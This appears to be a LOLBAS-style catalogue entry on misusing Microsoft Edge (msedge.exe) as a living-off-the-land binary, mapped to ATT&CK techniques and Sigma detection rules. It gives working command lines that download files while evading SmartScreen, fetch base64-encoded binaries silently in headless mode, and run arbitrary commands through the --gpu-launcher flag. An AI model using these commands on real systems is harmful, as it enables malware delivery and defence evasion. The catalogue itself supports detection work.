.. /Msedge.exe

Star

Paths:

• c:\Program Files\Microsoft\Edge\Application\msedge.exe
• c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Resources:

• https://twitter.com/mrd0x/status/1478116126005641220
• https://twitter.com/mrd0x/status/1478234484881436672

Acknowledgements:

• mr.d0x (@mrd0x)

Detections:

• Sigma: proc_creation_win_browsers_msedge_arbitrary_download.yml
• Sigma: proc_creation_win_browsers_chromium_headless_file_download.yml

Download

1. Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.

   msedge.exe https://www.example.org/file.exe.txt

   Use case

   Download file from the internet

   Privileges required

   User

   Operating systems

   Windows 10, Windows 11

   ATT&CK® technique

   T1105: Ingress Tool Transfer

2. Edge will silently download the file. File extension should be .html and binaries should be encoded.

   msedge.exe --headless --enable-logging --disable-gpu --dump-dom "https://www.example.org/file.base64.html" > file.b64

   Use case

   Download file from the internet

   Privileges required

   User

   Operating systems

   Windows 10, Windows 11

   ATT&CK® technique

   T1105: Ingress Tool Transfer

Execute

1. Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command

   msedge.exe --disable-gpu-sandbox --gpu-launcher="cmd /c c:\windows\system32\calc.exe &&"

   Use case

   Executes a process under a trusted Microsoft signed binary

   Privileges required

   User

   Operating systems

   Windows 10, Windows 11

   ATT&CK® technique

   T1218.015: Electron Applications

   Tags

   Execute: CMD